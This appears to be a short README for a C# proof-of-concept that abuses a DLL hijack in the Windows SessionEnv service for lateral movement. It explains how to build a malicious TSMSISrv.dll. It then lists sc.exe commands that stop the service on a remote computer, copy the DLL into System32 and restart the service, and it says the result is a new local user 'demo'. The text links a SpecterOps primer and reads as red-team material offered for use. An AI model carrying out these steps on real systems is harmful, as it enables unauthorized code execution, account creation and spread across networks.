The SessionEnv service, which is installed by default on Windows, contains a DLL hijack. When a user with administrative privilege can restart this service they could utilize it for lateral movement.
This C# POC code leverages the called functions of the TSMSISrv.dll by putting malicious logic within StartComponent.
Ensure you have UnmanagedExports installed and are building for your target architecture. Then, you can simply build the release version of the project.
sc.exe \\COMPUTER stop SessionEnv
copy TSMSISrv.dll to C:\Windows\System32\TSMSISrv.dll
sc.exe \\COMPUTER start SessionEnv
Execution should have occurred adding a new user "demo".
https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992